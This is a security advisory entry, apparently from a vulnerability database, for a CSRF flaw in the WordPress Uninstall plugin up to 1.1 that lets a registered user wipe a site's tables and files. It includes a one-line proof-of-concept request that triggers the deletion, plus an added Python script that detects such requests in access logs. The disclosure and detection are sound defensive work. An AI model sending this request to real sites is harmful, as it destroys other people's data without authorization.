WordPress Uninstall <= 1.1 - WordPress Deletion via CSRF



Description
Any registered user can delete all WordPress database tables and files.
Proof of Concept
This request makes it possible:
http://wp.dev/wp-admin/admin-ajax.php?action=uninstall
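
A log check for the request shown above, as an added example that is not part of the original advisory: it scans web access-log lines for requests to `admin-ajax.php` with `action=uninstall` and marks those whose Referer is on another host, which is how a forged (CSRF) request typically appears. The Combined Log Format, the function name and the sample lines are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed format: Combined Log Format
# ip - user [time] "METHOD target PROTO" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "[^"]*"$'
)

def find_uninstall_requests(lines, site_host):
    """Return one finding per request to admin-ajax.php with action=uninstall."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # not in the assumed format; skip rather than guess
        url = urlsplit(m["target"])
        if not url.path.lower().endswith("/wp-admin/admin-ajax.php"):
            continue
        # parse_qs decodes percent-encoding before the comparison
        actions = [a.lower() for a in parse_qs(url.query).get("action", [])]
        if "uninstall" not in actions:
            continue
        ref_host = urlsplit(m["referer"]).hostname  # None for "-" or empty
        findings.append({
            "ip": m["ip"], "time": m["time"], "status": int(m["status"]),
            # Referer on a different host than the site: request came cross-site
            "cross_site": ref_host is not None and ref_host != site_host.lower(),
        })
    return findings

# Constructed sample lines (not taken from a real server)
SAMPLE_LOG = [
    '203.0.113.7 - - [11/Feb/2015:10:02:11 +0000] "GET /wp-admin/admin-ajax.php?action=uninstall HTTP/1.1" 200 1 "http://forum.example/thread/42" "Mozilla/5.0"',
    '198.51.100.4 - - [11/Feb/2015:10:03:40 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 58 "http://wp.dev/wp-admin/" "Mozilla/5.0"',
    '198.51.100.4 - - [11/Feb/2015:10:05:02 +0000] "GET /wp-admin/admin-ajax.php?action=uninstall HTTP/1.1" 200 1 "http://wp.dev/wp-admin/" "Mozilla/5.0"',
    '192.0.2.9 - - [11/Feb/2015:10:06:00 +0000] "GET /index.php?action=uninstall HTTP/1.1" 200 512 "-" "curl/7.40"',
]

if __name__ == "__main__":
    for hit in find_uninstall_requests(SAMPLE_LOG, "wp.dev"):
        print(hit)
```

Access logs normally record only the query string, so a request that carries `action=uninstall` in a POST body will not be matched by this check.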

Affects Plugin

Fixed in version 1.2

References

CVE 2015-9332

Classification

Type CSRF
CWE CWE-352

Miscellaneous

Submitter SecuBeastTeam
Views 6757
Verified No
WPVDB ID 7715

Timeline

Publicly Published 2015-02-11 (over 5 years ago)
Added 2014-12-11 (over 5 years ago)
Last Updated 2019-11-27 (8 months ago)
